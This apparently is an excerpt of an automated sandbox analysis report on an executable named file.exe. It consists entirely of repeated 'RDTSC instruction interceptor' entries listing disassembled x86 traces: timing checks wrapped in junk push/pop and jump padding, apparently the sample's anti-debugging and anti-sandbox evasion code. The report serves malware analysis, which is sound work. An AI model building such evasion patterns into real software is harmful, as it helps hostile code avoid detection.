Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9EC2F second address: F9ECA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5AD8CCD66Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F5AD8CCD66Eh 0x00000011 jmp 00007F5AD8CCD66Dh 0x00000016 pop esi 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F5AD8CCD66Fh 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pushad 0x00000027 popad 0x00000028 jmp 00007F5AD8CCD66Fh 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 jmp 00007F5AD8CCD676h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF444 second address: FEF448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF448 second address: FEF44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF44E second address: FEF463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F5AD8CCF43Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF463 second address: FEF468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF468 second address: FEF472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5AD8CCF436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF472 second address: FEF476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF3F29 second address: FF3F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC195A second address: FC198C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc cx, 46B8h 0x00000011 lea eax, dword ptr [ebp+1249369Fh] 0x00000017 mov ecx, esi 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1A2D second address: FC1A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1A31 second address: FC1A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1D5D second address: E01BFE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F5AD8CCF436h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 xor cl, 00000026h 0x00000017 push dword ptr [ebp+122D00B9h] 0x0000001d mov edx, esi 0x0000001f call dword ptr [ebp+122D178Ch] 0x00000025 pushad 0x00000026 jmp 00007F5AD8CCF43Dh 0x0000002b xor eax, eax 0x0000002d pushad 0x0000002e sbb di, CCF1h 0x00000033 cmc 0x00000034 popad 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop edx 0x0000003c mov dword ptr [ebp+122D32C7h], edx 0x00000042 popad 0x00000043 mov dword ptr [ebp+122D3890h], eax 0x00000049 mov dword ptr [ebp+122D32C7h], esi 0x0000004f jns 00007F5AD8CCF43Ch 0x00000055 mov esi, 0000003Ch 0x0000005a jbe 00007F5AD8CCF442h 0x00000060 jnl 00007F5AD8CCF43Ch 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a mov dword ptr [ebp+122D32C7h], edi 0x00000070 lodsw 0x00000072 cmc 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 cmc 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c stc 0x0000007d mov dword ptr [ebp+122D2466h], edx 0x00000083 push eax 0x00000084 pushad 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F5AD8CCF447h 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1F1D second address: FC1F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1F23 second address: FC1F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jo 00007F5AD8CCF436h 0x00000016 jo 00007F5AD8CCF436h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1F48 second address: FC1F8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5AD8CCD666h 0x00000009 jc 00007F5AD8CCD666h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F5AD8CCD670h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5AD8CCD678h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1F8A second address: FC1F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1F90 second address: FC1FAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 js 00007F5AD8CCD66Ch 0x0000000f push 10ACEBF8h 0x00000014 push edi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC21F1 second address: FC220B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AD8CCF446h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC27C0 second address: FC27C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC27C4 second address: FC27D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC28DD second address: FC28E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2B85 second address: FC2B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC2B8B second address: F9EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F5AD8CCD670h 0x0000000b pop eax 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007F5AD8CCD66Ah 0x00000015 and edx, dword ptr [ebp+122D39CCh] 0x0000001b pop edx 0x0000001c lea eax, dword ptr [ebp+124936E3h] 0x00000022 mov dword ptr [ebp+122D2FC5h], ecx 0x00000028 mov edx, dword ptr [ebp+122D1F1Fh] 0x0000002e push eax 0x0000002f jmp 00007F5AD8CCD673h 0x00000034 mov dword ptr [esp], eax 0x00000037 push esi 0x00000038 and ch, FFFFFF8Dh 0x0000003b pop edx 0x0000003c lea eax, dword ptr [ebp+1249369Fh] 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007F5AD8CCD668h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c mov dh, 52h 0x0000005e jmp 00007F5AD8CCD66Fh 0x00000063 push eax 0x00000064 ja 00007F5AD8CCD681h 0x0000006a mov dword ptr [esp], eax 0x0000006d call dword ptr [ebp+122DB7C5h] 0x00000073 pushad 0x00000074 jmp 00007F5AD8CCD675h 0x00000079 push eax 0x0000007a push edx 0x0000007b ja 00007F5AD8CCD666h 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF325B second address: FF325F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F719A3 second address: F719A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F719A9 second address: F719BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F5AD8CCF43Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD554 second address: FFD56A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5AD8CCD66Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD56A second address: FFD56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC1F6 second address: FFC1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC4C3 second address: FFC4D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC4D1 second address: FFC507 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5AD8CCD677h 0x00000008 jmp 00007F5AD8CCD671h 0x0000000d jmp 00007F5AD8CCD672h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC507 second address: FFC511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5AD8CCF436h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC93C second address: FFC97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F5AD8CCD678h 0x0000000b pushad 0x0000000c jc 00007F5AD8CCD666h 0x00000012 jno 00007F5AD8CCD666h 0x00000018 jmp 00007F5AD8CCD66Dh 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD1F4 second address: FFD1FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000F9F second address: 1000FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003ECB second address: 1003ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003BBC second address: 1003BCD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5AD8CCD666h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005D6D second address: 1005D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005D7C second address: 1005D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5AD8CCD675h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B196 second address: 100B19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B477 second address: 100B47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B47D second address: 100B481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B5CA second address: 100B5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jl 00007F5AD8CCD666h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B5EC second address: 100B5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B5F0 second address: 100B614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5AD8CCD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5AD8CCD676h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B614 second address: 100B61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B61C second address: 100B620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B8C0 second address: 100B8DE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5AD8CCF43Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F5AD8CCF45Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F5AD8CCF436h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B8DE second address: 100B8F4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5AD8CCD666h 0x00000008 jo 00007F5AD8CCD666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC25F8 second address: FC25FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC25FE second address: FC266B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5AD8CCD66Ah 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+1247E099h] 0x00000015 mov ebx, dword ptr [ebp+124936DEh] 0x0000001b jmp 00007F5AD8CCD672h 0x00000020 add eax, ebx 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F5AD8CCD668h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c mov dword ptr [ebp+1246B519h], ebx 0x00000042 push eax 0x00000043 pushad 0x00000044 push ecx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 pop ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F5AD8CCD66Fh 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC266B second address: FC266F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC266F second address: FC26C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F5AD8CCD668h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000004h 0x00000026 mov ecx, 5FAD4974h 0x0000002b nop 0x0000002c jmp 00007F5AD8CCD673h 0x00000031 push eax 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 jns 00007F5AD8CCD666h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC26C0 second address: FC26C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FCA1 second address: 100FCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCD673h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FCBB second address: 100FCC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FE26 second address: 100FE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FF87 second address: 100FF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FF91 second address: 100FF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FF97 second address: 100FFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F5AD8CCF436h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFA7 second address: 100FFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5AD8CCD673h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFC5 second address: 100FFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFD1 second address: 100FFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFD5 second address: 100FFE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFE5 second address: 1010028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F5AD8CCD693h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jg 00007F5AD8CCD666h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10142E0 second address: 10142F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10142F2 second address: 101430E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCD678h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013D74 second address: 1013D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013D78 second address: 1013D7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013D7E second address: 1013D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013D84 second address: 1013D8E instructions: 0x00000000 rdtsc 0x00000002 je 00007F5AD8CCD66Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A2F5 second address: 101A2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A2F9 second address: 101A2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A43C second address: 101A45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5AD8CCF442h 0x0000000c jns 00007F5AD8CCF436h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B163 second address: 101B16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B16B second address: 101B1BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5AD8CCF447h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F5AD8CCF44Bh 0x00000015 jmp 00007F5AD8CCF445h 0x0000001a pushad 0x0000001b jg 00007F5AD8CCF436h 0x00000021 push edx 0x00000022 pop edx 0x00000023 jp 00007F5AD8CCF436h 0x00000029 js 00007F5AD8CCF436h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B1BD second address: 101B1C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10209E8 second address: 10209FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F5AD8CCF436h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d je 00007F5AD8CCF436h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6FF88 second address: F6FF93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F5AD8CCD666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102397B second address: 10239A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F5AD8CCF436h 0x0000000c popad 0x0000000d jmp 00007F5AD8CCF448h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10239A0 second address: 10239A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10239A6 second address: 10239AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023D8F second address: 1023D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F5AD8CCD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
